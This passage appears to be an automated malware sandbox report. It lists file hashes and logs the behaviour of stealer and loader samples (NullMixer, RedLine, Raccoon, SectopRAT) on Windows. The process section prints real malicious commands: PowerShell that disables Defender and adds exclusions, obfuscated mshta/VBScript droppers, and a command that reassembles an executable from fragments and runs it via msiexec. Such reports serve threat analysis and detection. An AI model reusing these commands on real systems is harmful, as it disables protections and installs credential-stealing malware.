| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
memory/3516-65-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3516-63-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/760-285-0x0000000002410000-0x000000000256D000-memory.dmp
memory/2828-286-0x0000000002720000-0x000000000287D000-memory.dmp
memory/2828-287-0x0000000002C30000-0x0000000002CD6000-memory.dmp
memory/2828-291-0x0000000002CE0000-0x0000000002D73000-memory.dmp
memory/2828-289-0x0000000002CE0000-0x0000000002D73000-memory.dmp
memory/760-314-0x0000000002AD0000-0x0000000002B63000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
151s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2988 wrote to memory of 3248 | N/A | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe |
| PID 2988 wrote to memory of 3248 | N/A | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe |
| PID 2988 wrote to memory of 3248 | N/A | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe | C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe"
C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe
"C:\Users\Admin\AppData\Local\Temp\258cbb13ac4c202d338512321ecf7dc3f75ecde54077d2fde9ca1635d6d4c7bd.exe" -u
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
Files
Analysis: behavioral27
Detonation Overview
Submitted
2024-11-10 17:24
Reported
2024-11-10 17:27
Platform
win7-20241010-en
Max time kernel
149s
Max time network
155s
Command Line
Signatures
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2496 set thread context of 2436 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe |
| PID 1404 set thread context of 2948 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe |
| PID 612 set thread context of 2844 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19ac3c92c21.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c9e031f4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1932df4dae.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193e530416b51740a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19c28f648204dbd4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue1968b7ee9058232e8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue196397c0f84f8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue192c34b1c2f5.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue197e9ec0ff0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue193129b31e741ef3.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cef5687a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19d1fc7d2654d7a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19cd42a7c874e44.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19b4b38a7569a9.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cd42a7c874e44.exe
Tue19cd42a7c874e44.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c28f648204dbd4.exe
Tue19c28f648204dbd4.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193e530416b51740a.exe
Tue193e530416b51740a.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19cef5687a.exe
Tue19cef5687a.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue197e9ec0ff0.exe
Tue197e9ec0ff0.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe
Tue196397c0f84f8.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19ac3c92c21.exe
Tue19ac3c92c21.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19f40f8518b9946.exe
Tue19f40f8518b9946.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe
Tue1932df4dae.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1968b7ee9058232e8.exe
Tue1968b7ee9058232e8.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue193129b31e741ef3.exe
Tue193129b31e741ef3.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe
Tue19c9e031f4.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19d1fc7d2654d7a.exe
Tue19d1fc7d2654d7a.exe
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue192c34b1c2f5.exe
Tue192c34b1c2f5.exe /mixone
C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9QQVE.tmp\Tue196397c0f84f8.tmp" /SL5="$9018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe"
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe
"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19c9e031f4.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue19b4b38a7569a9.exe
Tue19b4b38a7569a9.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2704 -s 492
C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe
"C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe" /SILENT
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue1932df4dae.exe") do taskkill -iM "%~nXx" /f
C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp
"C:\Users\Admin\AppData\Local\Temp\is-DM892.tmp\Tue196397c0f84f8.tmp" /SL5="$A018E,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS45B58177\Tue196397c0f84f8.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe
~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ
C:\Windows\SysWOW64\taskkill.exe
taskkill -iM "Tue1932df4dae.exe" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " ,0 , TRuE ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe &&stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ("C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE (cREatEObjEcT ( "wscript.sHeLl" ).Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+ y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 ,TruE ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J+ RqC~~.A + TfSAy.w+y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E &Start msiexec -Y .\bENCc.E
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"
C:\Windows\SysWOW64\msiexec.exe
